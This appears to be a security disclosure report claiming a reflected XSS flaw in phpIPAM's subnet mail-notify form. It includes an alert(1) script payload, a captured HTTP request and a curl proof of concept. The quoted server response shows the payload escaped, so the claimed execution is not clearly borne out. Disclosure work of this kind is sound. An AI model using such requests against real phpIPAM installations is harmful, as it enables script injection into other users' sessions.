Description

Reflected cross-site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.

Proof of Concept

https://github.com/phpipam/phpipam/blob/master/app/subnets/mail-notify-subnet.php

look in line 94-95 where parameter "recipients" not validation, and i exploit xss with payload <script>alert(1)</script>

91 <tr>
92		<th>&lt;?php print _('Recipients'); ?&gt;</th>
93		<td>
94			&lt;input type="text" class='form-control input-sm pull-left' name="recipients" style="width:400px;margin-right:5px;"&gt;
95			<i></i>
96		</td>
97	</tr>

//request

POST /phpipam/app/subnets/mail-notify-subnet-check.php HTTP/1.1
Host: 192.168.1.15
Content-Length: 233
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.15
Referer: http://192.168.1.15/phpipam/index.php?page=subnets&section=1&subnetId=3
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,id;q=0.8
Cookie: search_parameters=%7B%22addresses%22%3A%22off%22%2C%22subnets%22%3A%22off%22%2C%22vlans%22%3A%22off%22%2C%22vrf%22%3A%22off%22%2C%22pstn%22%3A%22off%22%2C%22circuits%22%3A%22off%22%2C%22customers%22%3A%22off%22%7D; table-page-size=50; phpipam=nud7ajr1q60hh5vldp4n619m50
Connection: close

recipients=%3Cscript%3Ealert(1)%3C%2Fscript%3E&subject=Subnet+details+%3A%3A+10.10.1.0%2F24&content=%E2%80%A2+Subnet%3A+%09%09+10.10.1.0%2F24%0D%0A%E2%80%A2+Description%3A%09%09+Customer+1&csrf_cookie=JgdkDHJcdNgm9oIwbzai9zXWvMahk4vZ

//response

HTTP/1.1 200 OK
Date: Thu, 08 Dec 2022 03:42:38 GMT
Server: Apache/2.4.52 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: phpipam=nud7ajr1q60hh5vldp4n619m50; expires=Fri, 09 Dec 2022 03:42:38 +0000; Max-Age=86400; path=/; SameSite=Lax; HttpOnly;
Vary: Accept-Encoding
Content-Length: 87
Connection: close
Content-Type: text/html; charset=UTF-8

<div>Invalid email address - &lt;script&gt;alert(1)&lt;/script&gt;</div>

//POC in CURL

curl -i -s -k -X $'POST' \
    -H $'Host: 192.168.1.15' -H $'Content-Length: 233' -H $'Accept: */*' -H $'X-Requested-With: XMLHttpRequest' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Origin: http://192.168.1.15' -H $'Referer: http://192.168.1.15/phpipam/index.php?page=subnets&section=1&subnetId=3' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9,id;q=0.8' -H $'Connection: close' \
    -b $'search_parameters=%7B%22addresses%22%3A%22off%22%2C%22subnets%22%3A%22off%22%2C%22vlans%22%3A%22off%22%2C%22vrf%22%3A%22off%22%2C%22pstn%22%3A%22off%22%2C%22circuits%22%3A%22off%22%2C%22customers%22%3A%22off%22%7D; table-page-size=50; phpipam=nud7ajr1q60hh5vldp4n619m50' \
    --data-binary $'recipients=%3Cscript%3Ealert(1)%3C%2Fscript%3E&subject=Subnet+details+%3A%3A+10.10.1.0%2F24&content=%E2%80%A2+Subnet%3A+%09%09+10.10.1.0%2F24%0D%0A%E2%80%A2+Description%3A%09%09+Customer+1&csrf_cookie=JgdkDHJcdNgm9oIwbzai9zXWvMahk4vZ' \
    $'http://192.168.1.15/phpipam/app/subnets/mail-notify-subnet-check.php'